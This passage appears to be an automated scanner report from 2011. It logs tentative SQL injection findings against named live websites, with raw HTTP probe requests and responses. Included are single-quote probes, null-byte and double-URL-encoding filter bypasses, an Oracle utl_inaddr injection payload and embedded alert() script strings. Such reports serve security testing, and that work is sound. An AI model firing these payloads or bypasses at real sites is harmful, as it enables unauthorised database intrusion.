Path:   /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /15/182221'/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response 1

HTTP/1.1 500 Internal Server Error
Date: Fri, 04 Feb 2011 18:01:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 5859
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=NIMOGJOBDKLPJKOOCEPBMLJI; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS="ALERT(0X0006C1)</title>
...[SNIP]...

Request 2

GET /15/182221''/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response 2

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:01:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11730
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=MJMOGJOBEPNDDLCHJDPLEIAF; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS="ALERT(0X0006C1)</title>
...[SNIP]...

1.14. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /15/182221/abc-development-inc/chicago.aspx/x22'/%22ns=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response 1

HTTP/1.1 500 Internal Server Error
Date: Fri, 04 Feb 2011 18:01:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1495
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=BNMOGJOBONCKHCHLACPLEBGD; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22'/"NS="ALERT(0X0006C1)</title
...[SNIP]...

Request 2

GET /15/182221/abc-development-inc/chicago.aspx/x22''/%22ns=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response 2

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:01:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11750
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=JNMOGJOBBHGDIKEGFOMAOLDA; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22''/"NS="ALERT(0X0006C1)</titl
...[SNIP]...

1.15. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns'=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response 1

HTTP/1.1 500 Internal Server Error
Date: Fri, 04 Feb 2011 18:01:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1495
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=DPMOGJOBNNLPMDCLNBMEICJC; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS'="ALERT(0X0006C1)</title
...[SNIP]...

Request 2

GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns''=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response 2

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:01:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11750
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=KPMOGJOBMLCCEDABHNCMIGKC; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS''="ALERT(0X0006C1)</titl
...[SNIP]...

1.16. http://www.supermedia.com/support/contact-us/ [CstrStatus cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.supermedia.com
Path:   /support/contact-us/

Issue detail

The CstrStatus cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CstrStatus cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /support/contact-us/ HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://ir.supermedia.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U%00'; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762069|check#true#1296760269; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:18:43 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 24645


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Contact SuperMedia | SuperMedia.com Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Unable to extract the flow definition id parameter: make sure the client provides the '_flowId' parameter as input or set the 'defaultFlowId' property; the parameters provided in this reque
...[SNIP]...

Request 2

GET /support/contact-us/ HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://ir.supermedia.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U%00''; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762069|check#true#1296760269; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:18:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 24302


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Contact SuperMedia | SuperMedia.com Advertising</title>



...[SNIP]...

1.17. https://www.supermedia.com/spportal/indexLogin.do [s_cc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.supermedia.com
Path:   /spportal/indexLogin.do

Issue detail

The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /spportal/indexLogin.do HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true'; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:29:58 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
referrer="http://www.google.com/search?hl=en&q=f82520213c151ae1ef1e25df";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Badly formatted flow execution key '.80070</script>
...[SNIP]...

Request 2

GET /spportal/indexLogin.do HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true''; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:04 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...

1.18. https://www.supermedia.com/spportal/spportalFlow.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27&1'=1 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761732|check#true#1296759932; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:20:05 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20261


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
e next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Unable to extract the flow definition id parameter: make sure the client provides the '_flowId' parameter as input or set the 'defaultFlowId' property; the parameters provided in this reque
...[SNIP]...

Request 2

GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27&1''=1 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761732|check#true#1296759932; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:20:17 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 19960


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...

1.19. https://www.supermedia.com/spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C' [s_sq cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C'

Issue detail

The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the s_sq cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C' HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761701|check#true#1296759901; s_cc=true; s_sq=%5B%5BB%5D%5D%2527; undefined_s=First%20Visit

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:06:31 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 21158


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
e next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Badly formatted flow execution key ''||(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL
...[SNIP]...

Request 2

GET /spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C' HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761701|check#true#1296759901; s_cc=true; s_sq=%5B%5BB%5D%5D%2527%2527; undefined_s=First%20Visit

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:06:32 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20820


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...

1.20. http://www.youtube.com/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.youtube.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET / HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:01 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=Lw2qL_Rbihs; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 20:31:01 GMT
Set-Cookie: GEO=66cfdf9c9df4e3b550a4e342d19a849ccwsAAAAzVVOtwdbzTUsQhQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFZPU0o2Q1NWcms5RzNVSHc1cU94dGh3Vl9YTm0wbXJlV3J0czgyY3BHNzF3 -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Making Out FAIL" data-thumb="//i2.ytimg.com/vi/msJrcliQP8s/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/23');" >
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:01 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=x1-FJdMfy6I; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 20:31:01 GMT
Set-Cookie: GEO=66cfdf9c9df4e3b550a4e342d19a849ccwsAAAAzVVOtwdbzTUsQhQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFduWHJIWGFVcEtxc1FnQXdlcEVhZF8tYU5WbWpobkx6cm82NGZkd2dsNWRB -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...

1.21. http://www.youtube.com/ [hl parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.youtube.com
Path:   /

Issue detail

The hl parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the hl parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /?hl=en%00'&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:47:56 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 21:47:56 GMT
Set-Cookie: GEO=1511cab9604e8f09758fe0408381df3bcwsAAAAzVVOtwdbzTUsijA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFhXeklCak9QRXZYaG02c2d1ZDJJMFJMQUcwVTB6eW9DRUl2ZzhlNVZZSkxn -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Making Out FAIL" data-thumb="//i2.ytimg.com/vi/msJrcliQP8s/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/23');" >
...[SNIP]...

Request 2

GET /?hl=en%00''&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:47:56 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 21:47:56 GMT
Set-Cookie: GEO=1511cab9604e8f09758fe0408381df3bcwsAAAAzVVOtwdbzTUsijA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
